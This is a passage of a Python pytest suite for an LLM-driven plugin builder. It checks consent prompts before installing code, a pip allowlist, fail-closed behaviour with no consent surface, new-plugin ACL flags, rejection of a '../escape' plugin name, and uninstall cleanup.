            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "syntax" in result.content.lower()
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_pip_install_skipped_when_ast_check_fails(self, tmp_path):
        """AST completeness runs BEFORE pip install — a malformed
        declaration shouldn't side-effect pip even with a vetted allowlist."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=_under_declared_server_py(),
            required_capabilities=["external_data_read"],
            pip_deps=["requests"],
        )
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=["requests"],
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert pip_calls == []


# ---------------------------------------------------------------------------
# Cycle 11 — install-time consent prompt (Issue #51, ADR-0005)
#
# Generated plugins now ride through the consent surface (#48) so the user
# sees one prompt per build for the whole `code_install` capability. The
# prompt's args_preview carries the six fields from the AC: name,
# description, capabilities-in-user-language, pip deps, source preview link,
# and the verb shown by the surface itself (the four Once/Session/
# Persistent/Deny buttons live in the surface, not the builder).
# ---------------------------------------------------------------------------


class _ScriptedConsent:
    """Test fake: returns whatever the caller queues, in order.

    Snapshots whether `args["preview_path"]` resolves to a real file *at
    the moment of the request* — the builder stages source into a
    TemporaryDirectory that's gone by the time the test inspects `received`,
    so the file check has to happen inline.
    """

    def __init__(self, *decisions) -> None:
        self.decisions = list(decisions)
        self.received: list[dict] = []

    async def request(self, capability, tool_name, args, flags=None):
        args_snap = dict(args or {})
        preview = args_snap.get("preview_path")
        args_snap["preview_path_is_file_at_request"] = bool(
            preview and Path(preview).is_file()
        )
        self.received.append({
            "capability": capability,
            "tool_name": tool_name,
            "args": args_snap,
            "flags": flags,
        })
        if not self.decisions:
            raise AssertionError("no scripted decision for this prompt")
        return self.decisions.pop(0)

    def set_acl(self, acl) -> None:
        pass


class TestBuilderInstallPrompt:
    @pytest.mark.asyncio
    async def test_install_prompt_fires_for_code_install_capability(self, tmp_path):
        """One prompt per build, capability=CODE_INSTALL, tool_name names the
        builder so the tray's preview disambiguates from real `builder_create`
        calls inside the orchestrator."""
        from cerebral.security import Capability
        from plugins.builder import BuilderPlugin

        consent = _ScriptedConsent(Decision.SILENT)
        orc = MCPOrchestrator(consent=consent)
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert len(consent.received) == 1
        prompt = consent.received[0]
        assert prompt["capability"] is Capability.CODE_INSTALL
        assert prompt["tool_name"] == "builder.install"

    @pytest.mark.asyncio
    async def test_install_prompt_carries_user_facing_fields(self, tmp_path):
        """args_preview must include name, description, user-facing
        capability labels, pip deps, and a source preview path."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            pip_deps=["requests"],
            required_capabilities=["external_data_read", "fs_write"],
        )
        consent = _ScriptedConsent(Decision.SILENT)
        orc = MCPOrchestrator(consent=consent)
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        args = consent.received[0]["args"]
        assert args["plugin_name"] == "weatherbug"
        assert args["description"].startswith("Reports a single pong")
        # User-facing labels, not the raw vocabulary strings.
        labels = args["capability_labels"]
        assert "Write files on disk" in labels
        assert "Read data from an external account" in labels
        assert args["pip_deps"] == ["requests"]
        # Source preview path (the tray opens it; we just verify a string
        # pointing at a real file on disk at the moment of the prompt).
        preview_path = Path(args["preview_path"])
        assert preview_path.name == "server.py"
        assert args["preview_path_is_file_at_request"] is True

    @pytest.mark.asyncio
    async def test_install_prompt_deny_blocks_persistence_and_registration(self, tmp_path):
        """User clicks Deny → no pip install, no file move, no orchestrator
        registration, error returned to caller."""
        from plugins.builder import BuilderPlugin

        consent = _ScriptedConsent(Decision.DENY)
        orc = MCPOrchestrator(consent=consent)
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(dict(_GENERATED_PAYLOAD, pip_deps=["requests"])),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "cancel" in result.content.lower() or "denied" in result.content.lower()
        assert pip_calls == [], "Deny must not install pip deps"
        assert smoke_calls == [], "Deny must not run smoke"
        assert not (tmp_path / "weatherbug").exists()
        assert "weatherbug" not in orc._plugins

    @pytest.mark.asyncio
    async def test_install_prompt_runs_before_pip_install(self, tmp_path):
        """pip install only fires after the user has consented (sharpener
        #1: 'single install-time prompt consumes code_install once for the
        whole build')."""
        from plugins.builder import BuilderPlugin

        consent = _ScriptedConsent(Decision.SILENT)
        orc = MCPOrchestrator(consent=consent)
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(dict(_GENERATED_PAYLOAD, pip_deps=["requests"])),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error
        # Consent prompt before pip install (received before call recorded).
        assert len(consent.received) == 1
        assert pip_calls == ["requests"]

    @pytest.mark.asyncio
    async def test_install_with_no_consent_surface_fails_closed(self, tmp_path):
        """ADR-0005 fail-closed rule: orchestrator has no consent surface
        wired → builder refuses to install."""
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()  # No consent surface.
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "consent" in result.content.lower()
        assert pip_calls == []
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()


# ---------------------------------------------------------------------------
# Cycle 12 — description field required (Issue #51, ADR-0005)
# ---------------------------------------------------------------------------


class TestBuilderDescriptionField:
    @pytest.mark.asyncio
    async def test_missing_description_in_payload_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = {k: v for k, v in _GENERATED_PAYLOAD.items() if k != "description"}
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "description" in result.content.lower()
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_empty_description_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, description="   ")  # whitespace
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "description" in result.content.lower()


# ---------------------------------------------------------------------------
# Cycle 13 — builder marks installs with the new-plugin flag (Issue #51).
# ---------------------------------------------------------------------------


def _make_pm(tmp_path):
    """Cheap ProfileManager + profile, returned together."""
    from cerebral.db.profiles import ProfileManager
    pm = ProfileManager(db_path=tmp_path / "openmind.db")
    profile = pm.create(name="Alice")
    return pm, profile


class TestBuilderNewPluginFlag:
    @pytest.mark.asyncio
    async def test_install_sets_new_plugin_flag(self, tmp_path):
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert pm.get_plugin_new_flag("weatherbug") is True

    @pytest.mark.asyncio
    async def test_install_without_profile_manager_leaves_flag_unset(self, tmp_path):
        """Tests that don't bring a ProfileManager (legacy paths) still work;
        the flag is simply not recorded. Production wiring always supplies pm."""
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)  # Used only to verify nothing landed.
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            # No profile_manager kwarg.
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert pm.get_plugin_new_flag("weatherbug") is False

    @pytest.mark.asyncio
    async def test_new_plugin_flag_forces_ask_through_orchestrator(self, tmp_path):
        """Regression: persistent SILENT class grant on FS_WRITE + new-plugin
        flag on `weatherbug` → ACL.resolve returns ASK for weatherbug_ping,
        because the new-plugin carve-out skips the persistent grant.

        This is the AC#4 sharpener pin assertion: 'persistent SILENT grant
        on FS_WRITE + new-plugin-flag-on plugin -> ACL still returns ASK'.
        """
        from cerebral.security import Capability, ProfileACL
        from plugins.builder import BuilderPlugin

        pm, profile = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        # 1. User has already granted FS_WRITE persistently at SILENT.
        pm.set_acl_grant(
            profile.id, scope="class", target="fs_write", policy="silent",
        )

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(dict(
                _GENERATED_PAYLOAD,
                required_capabilities=["external_data_read", "fs_write"],
            )),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        # 2. Install the plugin. The new_plugin flag should be set.
        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content

        # 3. Build an ACL with the orchestrator+pm wiring (mirrors what
        #    cerebral/main.py:_build_acl does).
        def _new_flag(tool_name):
            plugin = orc.plugin_for_tool(tool_name)
            return bool(plugin) and pm.get_plugin_new_flag(plugin)

        acl = ProfileACL(
            profile_id=profile.id,
            profile_manager=pm,
            defaults_snapshot=profile.acl_defaults_snapshot,
            new_plugin_flag_for_tool=_new_flag,
        )
        assert acl.resolve(Capability.FS_WRITE, "weatherbug_ping") is Decision.ASK


# ---------------------------------------------------------------------------
# Cycle 14 — "uninstall first" error on re-install (Issue #51).
# ---------------------------------------------------------------------------


class TestBuilderUninstallFirst:
    @pytest.mark.asyncio
    async def test_existing_subdir_error_names_uninstall(self, tmp_path):
        from plugins.builder import BuilderPlugin

        (tmp_path / "weatherbug").mkdir()
        (tmp_path / "weatherbug" / "server.py").write_text("# already")
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "uninstall first" in result.content.lower()

    @pytest.mark.asyncio
    async def test_existing_flat_file_error_names_uninstall(self, tmp_path):
        from plugins.builder import BuilderPlugin

        (tmp_path / "weatherbug.py").write_text("PLUGIN_NAME = 'weatherbug'\n")
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "uninstall first" in result.content.lower()


# ---------------------------------------------------------------------------
# Cycle 15 — builder_uninstall removes files, ACL rows, and the flag (Issue #51).
# ---------------------------------------------------------------------------


class TestBuilderUninstall:
    @pytest.mark.asyncio
    async def test_uninstall_drops_per_tool_acl_rows_only(self, tmp_path):
        """Per the sharpener: per-tool overrides for the plugin's tools are
        dropped; class-scope rows survive (a user who granted FS_WRITE
        persistently to one plugin probably wants it for the next one too)."""
        from plugins.builder import BuilderPlugin

        pm, profile = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        await builder.call_tool("builder_create", {"description": "x"})

        # User adds a per-tool override on a weatherbug tool, plus a class
        # grant on the FS_WRITE class (unrelated to weatherbug — it's a
        # capability-level grant).
        pm.set_acl_grant(
            profile.id, scope="tool", target="weatherbug_ping", policy="deny",
        )
        pm.set_acl_grant(
            profile.id, scope="class", target="fs_write", policy="silent",
        )

        result = await builder.call_tool(
            "builder_uninstall", {"name": "weatherbug"},
        )
        assert not result.is_error, result.content

        # Per-tool override gone; class-scope FS_WRITE grant survives.
        targets = {(r["scope"], r["target"]) for r in pm.list_acl_grants(profile.id)}
        assert ("tool", "weatherbug_ping") not in targets
        assert ("class", "fs_write") in targets

    @pytest.mark.asyncio
    async def test_uninstall_removes_plugin_directory(self, tmp_path):
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        await builder.call_tool("builder_create", {"description": "x"})
        assert (plugins_dir / "weatherbug").exists()

        await builder.call_tool("builder_uninstall", {"name": "weatherbug"})
        assert not (plugins_dir / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_uninstall_clears_new_plugin_flag(self, tmp_path):
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        await builder.call_tool("builder_create", {"description": "x"})
        assert pm.get_plugin_new_flag("weatherbug") is True

        await builder.call_tool("builder_uninstall", {"name": "weatherbug"})
        assert pm.get_plugin_new_flag("weatherbug") is False

    @pytest.mark.asyncio
    async def test_uninstall_unregisters_from_orchestrator(self, tmp_path):
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        await builder.call_tool("builder_create", {"description": "x"})
        assert "weatherbug" in orc._plugins
        await builder.call_tool("builder_uninstall", {"name": "weatherbug"})
        assert "weatherbug" not in orc._plugins
        assert orc.plugin_for_tool("weatherbug_ping") is None

    @pytest.mark.asyncio
    async def test_uninstall_then_recreate_succeeds(self, tmp_path):
        """The full uninstall → reinstall cycle is the user-facing 'update'
        path (the builder refuses to overwrite, so updates go this way)."""
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        await builder.call_tool("builder_create", {"description": "x"})
        await builder.call_tool("builder_uninstall", {"name": "weatherbug"})
        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content

    @pytest.mark.asyncio
    async def test_uninstall_unknown_plugin_fails_cleanly(self, tmp_path):
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()
        orc = _make_orc()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
            profile_manager=pm,
        )

        result = await builder.call_tool("builder_uninstall", {"name": "neverexisted"})
        assert result.is_error
        assert "not found" in result.content.lower() or "no plugin" in result.content.lower()

    @pytest.mark.asyncio
    async def test_uninstall_invalid_name_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        pm, _ = _make_pm(tmp_path)
        builder = BuilderPlugin(
            orchestrator=_make_orc(),
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
            profile_manager=pm,
        )
        result = await builder.call_tool("builder_uninstall", {"name": "../escape"})
        assert result.is_error
        assert "name" in result.content.lower()

    def test_builder_uninstall_tool_listed(self):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=_make_orc(),
            plugins_dir=Path("/tmp/x"),
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )
        names = [t.name for t in builder.list_tools()]
        assert "builder_uninstall" in names


# ---------------------------------------------------------------------------
# Cycle 16 — second install after the first picks Persistent rides through
# silently on Capability.CODE_INSTALL (Issue #51 sharpener Cycle N).
# ---------------------------------------------------------------------------


class TestBuilderPersistentGrant:
    @pytest.mark.asyncio
    async def test_persistent_grant_makes_second_install_silent(self, tmp_path):
        """User picks Persistent on first install. A second install of a
        DIFFERENT plugin name no longer triggers the prompt because the
        ACL now carries a persistent SILENT grant for code_install.

        We model the ACL+consent integration with a real ProfileACL +
        a thin fake consent surface that mutates the ACL on Persistent
        (mirroring the production ConsentSurface._apply_choice path).
        """
        from cerebral.security import Capability, ProfileACL
        from plugins.builder import BuilderPlugin

        pm, profile = _make_pm(tmp_path)
        plugins_dir = tmp_path / "plugins"
        plugins_dir.mkdir()

        # Build the ACL the way main.py does.
        def _new_flag(tool_name):
            plugin = orc.plugin_for_tool(tool_name)
            return bool(plugin) and pm.get_plugin_new_flag(plugin)

        acl = ProfileACL(
            profile_id=profile.id,
            profile_manager=pm,
            defaults_snapshot=profile.acl_defaults_snapshot,
            new_plugin_flag_for_tool=_new_flag,
        )

        # Fake consent surface: first call mutates ACL with Persistent
        # SILENT for the requested class then returns SILENT; subsequent
        # calls short-circuit on the persistent grant (no longer ASK).
        prompt_count = {"n": 0}

        class _PersistThenSilent:
            async def request(self, capability, tool_name, args, flags=None):
                # Simulate the real surface: resolve via the ACL first.
                resolved = acl.resolve(capability, tool_name, flags)
                if resolved is Decision.SILENT:
                    return Decision.SILENT
                if resolved is Decision.DENY:
                    return Decision.DENY
                # Was ASK — the user is being prompted. First time pick
                # Persistent; subsequent prompts shouldn't happen.
                prompt_count["n"] += 1
                acl.set_persistent_class(capability, Decision.SILENT)
                return Decision.SILENT

            def set_acl(self, _acl):
                pass

        consent = _PersistThenSilent()
        orc = MCPOrchestrator(acl=acl, consent=consent)
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=plugins_dir,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            profile_manager=pm,
        )

        # First install.
        r1 = await builder.call_tool("builder_create", {"description": "x"})
        assert not r1.is_error, r1.content
        assert prompt_count["n"] == 1

        # Second install — different plugin name, same code_install class.
        # The persistent grant from install #1 should resolve to SILENT
        # without re-prompting. The generated source must match the new
        # name (PLUGIN_NAME and class name) so the orchestrator actually
        # registers it under "other" and doesn't collide with "weatherbug".
        other_source = (
            _GENERATED_SERVER
            .replace("weatherbug", "other")
            .replace("WeatherbugPlugin", "OtherPlugin")
        )
        builder._llm = _make_llm_fn(dict(
            _GENERATED_PAYLOAD,
            name="other",
            server_py=other_source,
            smoke_tool="other_ping",
        ))
        r2 = await builder.call_tool("builder_create", {"description": "x"})
        assert not r2.is_error, r2.content
        assert prompt_count["n"] == 1, (
            "Second install must not re-prompt — the persistent SILENT grant "
            "on code_install rides through."
        )
        # Both plugins are registered.
        assert "weatherbug" in orc._plugins
        assert "other" in orc._plugins
